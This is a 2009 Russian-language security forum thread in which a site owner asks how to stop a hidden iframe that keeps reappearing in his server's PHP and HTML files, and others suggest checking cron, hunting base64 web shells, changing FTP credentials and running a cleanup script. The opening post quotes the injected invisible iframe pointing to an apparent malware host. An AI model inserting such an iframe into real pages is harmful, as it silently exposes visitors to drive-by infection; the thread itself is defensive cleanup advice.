HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность > *nix
Перезагрузить страницу как удалить iframe?
   
 
 
Опции темы Поиск в этой теме Опции просмотра

как удалить iframe?
  #1  
Старый 02.09.2009, 18:29
Gidz
Познающий
Регистрация: 10.08.2009
Сообщений: 30
С нами: 8816961

Репутация: 4
По умолчанию как удалить iframe?
Млин, совсем меня извел, не могу не как удалить на сервере iframe, grep-ом ищу в файлах .php .shtml .html по названию iframe, чищу все что находит, но через какое-то время они опять заражаются, вот такой куйней
Код:
<iframe src="http://x3y.ru:8080/index.php" width=116 height=134 style="visibility: hidden"></iframe>
чье это?

вообщем прошу помощи, уже несколько раз менял пароли на фтп и на рута, проверял свой локальный комп разными сканерами, curelt/AVZ/KasperskyVRT, поменял фтп клиента, но не помогло
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Gidz; 02.09.2009 в 18:37..
 

  #2  
Старый 02.09.2009, 18:42
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
С нами: 10371202

Репутация: 341
По умолчанию
проверь cron)
 

  #3  
Старый 02.09.2009, 18:52
Karantin
Постоянный
Регистрация: 21.12.2007
Сообщений: 475
С нами: 9678661

Репутация: 387
По умолчанию
Может у тебя хостера похакали?
 

  #4  
Старый 02.09.2009, 19:50
POS_troi
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
С нами: 10233548

Репутация: 1118


По умолчанию
поиши еще по base64 (шелл может) + пасс от ФТП смени (за дурака не держу, просто не писал ты о этом действии).
 

  #5  
Старый 02.09.2009, 20:47
lo0
Участник форума
Регистрация: 06.03.2006
Сообщений: 122
С нами: 10621225

Репутация: 72
По умолчанию
Цитата:
Сообщение от Gidz  
уже несколько раз менял пароли на фтп и на рута
Смени владельца файла и поставь права тока на чтение.
Но лучше курить логи и дырку латать
 

  #6  
Старый 05.09.2009, 21:00
Ex@rcist
Новичок
Регистрация: 04.09.2009
Сообщений: 23
С нами: 8781496

Репутация: 10
Smile
Сам недавно столкнулся с этой заразой. Пришлось чистить сотни страниц на нескольких серверах.
Помог этот простенький скрипт (может кому пригодится чтобы не чистить руками):

Код:
find . -type f -name '*.php' | xargs perl -p -i -e 's/.*malware_domain.*$//g'
Б большинстве случаев причина заражения - на стороне клиента. Трой ворует пароли ftp - после делает конет на сервак, ищет файлы заглавных страниц index.php index.html main.html page.html и делает инъекцию кода.

Поэтому первое лекарство - свежий бесплатный антивирус с новыми базами http://www.freedrweb.com/cureit/ Ну и конечно же поиск багов на сайте.
 

  #7  
Старый 06.09.2009, 17:08
pithagora
Новичок
Регистрация: 24.08.2007
Сообщений: 15
С нами: 9849523

Репутация: 6
По умолчанию
у вас троян пишет в скриптах iframe. создает себе место где пихает ссылки на ресурсы. он гадит скрипты и если это онлайн сайт, Гугл сканирует код и находит и считает как вредоносное ПО для компа. У меня было несколько таких случий на наших серверах. Рекомендую менять все пароли на сложные, очистить все скрипты, и поработать над дырами скриптов и улучшить безопасность. Потом, если это сайт, надо сообщить Гуглу что вы предприняли все меры чтоб скрипты работали нормально и чтоб они переиндексировали сайт.
 
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Если ты попал... (записки бывалого программиста) ErrorNeo Статьи 135 23.01.2016 11:59
Халявный Интернет (для маленьких) stopxaker Статьи 91 20.04.2010 19:52
Социальная инженерия. Профессиональное программирование. Последовательный взлом dinar_007 Болталка 15 23.12.2008 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.